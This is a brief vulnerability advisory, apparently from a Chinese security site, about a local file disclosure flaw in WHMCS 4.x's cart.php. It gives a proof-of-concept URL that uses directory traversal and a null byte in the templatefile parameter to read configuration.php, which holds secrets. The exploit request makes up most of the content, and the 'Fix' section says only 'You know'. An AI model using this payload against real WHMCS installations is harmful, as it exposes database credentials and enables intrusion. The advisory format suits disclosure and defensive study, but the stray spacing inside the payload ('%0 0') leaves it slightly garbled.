WHMCS (cart.php) local file disclosure flaws and fixes-vulnerability warning-the black bar safety net

2011-12-30T00:00:00
ID MYHACK58:62201132744
Type myhack58
Reporter 佚名
Modified 2011-12-30T00:00:00

Description

Author: R-t33n

Product: WHMCS

Developer: http://whmcs.com/

Affected version: 4. x. x

Defect type: Remote , webapps

Test platform windows 2 0 0 3 , Linux , ubuntu.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

http://www.badguest.cn/ [ PATH ] /cart. php? a=[wrong value]&templatefile=[File]%0 0

http://www.badguest.cn/ [ PATH ] /cart. php? a=alb0zz&templatefile=../../../configuration. php%0 0

see into the [html] source code for the file disclosure.

Fix:

You know